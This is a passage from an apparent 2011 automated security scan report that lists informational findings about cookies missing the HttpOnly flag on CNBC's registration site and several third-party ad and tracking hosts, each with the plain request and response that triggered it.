Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_80=834785856.20480.0000; expires=Tue, 06-Sep-2011 18:01:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://register.cnbc.com/forgotPassword.do">he
...[SNIP]...

13.149. http://register.cnbc.com/forgotpassword1.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://register.cnbc.com
Path:	/forgotpassword1.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1153552960.20480.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgotpassword1.jsp HTTP/1.1
Host: register.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:01:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://register.cnbc.com/forgotpassword1.jsp
Content-Length: 229
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_80=1153552960.20480.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://register.cnbc.com/forgotpassword1.jsp">
...[SNIP]...

13.150. https://register.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.151. https://register.cnbc.com/RandomImage.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/RandomImage.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.152. https://register.cnbc.com/cas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/cas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.153. https://register.cnbc.com/checkemail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkemail.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkemail.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.154. https://register.cnbc.com/checkpassword.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkpassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkpassword.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:46 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:46 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Password is required</description>
<timestamp>Tue Sep 06 11:05:46 EDT 2011</timestamp>

...[SNIP]...

13.155. https://register.cnbc.com/checkscreenname.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkscreenname.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkscreenname.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.156. https://register.cnbc.com/checkzipcode.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/checkzipcode.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkzipcode.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 226
Connection: close
Content-Type: text/xml;charset=ISO-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:47 GMT; path=/

<?xml version="1.0" encoding="ISO-8859-1"?>

<response>
<status>FAILURE</status>
<description>Zip Code is required</description>
<timestamp>Tue Sep 06 11:05:47 EDT 2011</timestamp>

...[SNIP]...

13.157. https://register.cnbc.com/createUser.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/createUser.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /createUser.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.158. https://register.cnbc.com/css/forgotPassword.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/forgotPassword.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.159. https://register.cnbc.com/css/member_center_sytles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/member_center_sytles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.160. https://register.cnbc.com/css/newRegistration.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/newRegistration.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.161. https://register.cnbc.com/css/registration.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/css/registration.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "2a54-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 10836
Connection: close
Content-Type: text/css
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

.bodyclass {
margin-top: 0px;
background-image:url(../images/tile.gif);
background-repeat:repeat;

}
.regis_copyright {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 11px;
   font-
...[SNIP]...

13.162. https://register.cnbc.com/email/EmailSupport.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/email/EmailSupport.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /email/EmailSupport.jsp HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.163. https://register.cnbc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.164. https://register.cnbc.com/forgotPassword1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/forgotPassword1.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.165. https://register.cnbc.com/forgotpassword1.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/forgotpassword1.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.166. https://register.cnbc.com/images/clickToContinue.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/clickToContinue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.167. https://register.cnbc.com/images/loaderImage.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/loaderImage.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.168. https://register.cnbc.com/images/memberCenterHeader.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/memberCenterHeader.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.169. https://register.cnbc.com/images/submitPreferences.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/submitPreferences.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "334c-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 13132
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:02:10 13:53:01.........
...[SNIP]...

13.170. https://register.cnbc.com/images/tick.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/tick.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3a40-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 14912
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H..... Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:28:37.........
...[SNIP]...

13.171. https://register.cnbc.com/images/tile_02.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/tile_02.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.172. https://register.cnbc.com/images/wrong.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/images/wrong.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3d8b-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 15755
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:43:29.........
...[SNIP]...

13.173. https://register.cnbc.com/js/membercenter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/membercenter.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.174. https://register.cnbc.com/js/prototype_ajax.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/prototype_ajax.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.175. https://register.cnbc.com/js/registrationBasic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/registrationBasic.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.176. https://register.cnbc.com/js/registrationUtils.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/registrationUtils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.177. https://register.cnbc.com/js/registrationValidations.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/registrationValidations.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT
ETag: "1dac-47d9ed5f8cdc0"
Accept-Ranges: bytes
Content-Length: 7596
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

//Field Validations - start
var goEmail = true;
var goEmailConf = true;
var goPwd = true;
var goPwdConf = true;
var goSecQstn = true;
var goSecAns = true;
var goScrnNm = true;
var goFrstNm = true;
var
...[SNIP]...

13.178. https://register.cnbc.com/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.179. https://register.cnbc.com/js/validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/js/validation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.180. https://register.cnbc.com/quote-html-webservice/fvquote.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/quote-html-webservice/fvquote.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/fvquote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.181. https://register.cnbc.com/quote-html-webservice/quote.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/quote-html-webservice/quote.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/quote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.182. https://register.cnbc.com/refreshlogin.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/refreshlogin.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.183. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.184. http://search.spotxchange.com/track/tag/6382.1008/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.spotxchange.com
Path:	/track/tag/6382.1008/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.185. http://server.iad.liveperson.net/hc/52793056/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/hc/52793056/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1315323151587; expires=Wed, 07-Sep-2011 15:32:31 GMT; path=/
HumanClickSiteContainerID_52793056=STANDALONE; path=/hc/52793056
LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.186. http://services.krxd.net/geoip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/geoip

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.187. http://services.krxd.net/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.188. http://sophelle.app5.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
